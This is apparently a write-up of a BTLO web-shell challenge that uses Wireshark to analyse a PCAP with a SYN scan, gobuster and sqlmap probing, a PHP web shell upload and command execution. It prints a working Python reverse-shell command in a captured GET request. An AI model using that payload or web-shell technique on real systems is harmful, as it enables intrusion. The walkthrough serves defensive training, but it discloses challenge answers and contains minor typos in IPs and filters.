BTLO — Network Analysis — Web Shell
The SOC received an alert in their SIEM for ‘Local to Local Port Scanning’ where an internal private IP began scanning another internal system. Can you investigate and determine if this activity is malicious or not? You have been provided a PCAP, investigate using any tools you wish.
Network Analysis — Web Shell requires analyisis of a PCAP. Wireshark is a great tool to do this.
What is the IP responsible for conducting the port scan activity?
A good place to start in network analysis is to understand what hosts are commuincating within the packet capture. Navigating to Statistics->Conversation->TCP will show what Addresses are talking, as well as the Ports used.
We know we’re looking for port scan actvitiy, which means an IP address scanning all of the ports on another IP address. If we sort on the target’s (B) port list, we can see some obvious port scanning going on, from the IP address 10.251.96.4
What is the port range scanned by the suspicious host?
We can sort on Port B both ways to see the first and last ports scanned, which tells is the port range 1-1024
What is the type of port scan conducted?
We know it is 10.251.96.4 conducting the port scan, so we can filter for src.ip==10.251.96.4 to focus only on that IP.
TCP SYN scanImmediately we see a load of SYN packets sent to each port for 10.251.96.5. This tells us that a TCP SYN scan was conducted.
Two more tools were used to perform reconnaissance against open ports, what were they?
To get the first reconnaissance tool, we can look to User Agent Strings which often leave a signature of the tool it is orginating from. Using the filter ip.dst == 10.251.96.5 && http.user_agent shows us all the packets that have a user agent string to the target IP. We quickly see a pattern of HTTP GET requests, and inspecting one of these shows us a suspicious tool referenced in the user agent string — gobuster 3.0.1
To find the second reconnaissance tool, proceed beyond the gobuster packets and notice a packet with significant URL encoding and embedded SQL commands. This too has a user agent string which tells us the tool used — sqlmap 1.4.7
What is the name of the php file through which the attacker uploaded a web shell?
When someone sends information to a webpage, it is through a HTTP POST request, so filtering for http.request.method==POST will show us all of these.
Scroll past the sqlmap requests (SQL injection attempts) we’ve seen before, and we see a POST for some /upload.php. Looking at this closer, we see the Referer which shows what file was uploaded — http://10.251.96.4/editprofile.php
What is the name of the web shell that the attacker uploaded? (1 points)
Following the TCP Stream tcp.stream eq 1270 shows us the packet information, where we can see the plaintext of the fileToUpload which is dbfunctions.php
tcp.stream eq 1270What is the parameter used in the web shell for executing commands?
Looking at the content of the identified dbfunctions.php we can see that the parameter used in the web shell for executing commands is cmd
What is the first command executed by the attacker?
Now we know the attacker IP and that they have already uploaded a file to act as a web shell, we can understand that subsequent GET requests to the file are executed as commands (cmd).
We can filter based upon this and see the commands which are executed by the attacker in the URL. ip.src==10.251.96.4 && http.request.method==GET with the first one being id.
ip.src==10.251.96.4 && http.request.method==GETWhat is the type of shell connection the attacker obtains through command execution?
The third command is clearly some python script. Follow the TCP Stream to view it fully.
GET /uploads/dbfunctions.php?cmd=python%20-c%20%27import%20socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((%2210.251.96.4%22,4422));os.dup2(s.fileno(),0);%20os.dup2(s.fileno(),1);%20os.dup2(s.fileno(),2);p=subprocess.call([%22/bin/sh%22,%22-i%22]);%27 HTTP/1.1Understanding this script tells is that is it a reverse shell to 210.251.96.4:4422 to utilize /bin/sh
What is the port he uses for the shell connection?
Again, looking at the python script, the port of the shell connection is 4422
Analysis of the PCAP has shown recon against a target IP of port scanning, gobuster, and sqlmap, leading to upload of suspicious files and command exectuion to create a reverse shell.
